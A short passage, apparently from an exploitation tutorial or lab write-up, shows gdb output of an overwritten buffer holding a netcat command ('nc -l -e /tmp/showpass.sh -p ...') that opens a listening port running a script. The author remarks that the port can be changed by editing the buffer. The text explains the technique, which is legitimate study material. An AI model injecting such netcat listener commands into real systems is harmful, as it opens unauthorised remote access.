Changes
0xbf9e3c64: 0xbf9e3c83
(gdb) x /s 0xbf9e3c83
0xbf9e3c83: "nc -l -e /tmp/showpass.sh -p 71128
</pre>
Amazing, it's gonna open a local port on 71128. You can modify the port, since it's part of the buffer you write
0xbf9e3c83: "nc -l -e /tmp/showpass.sh -p 1128"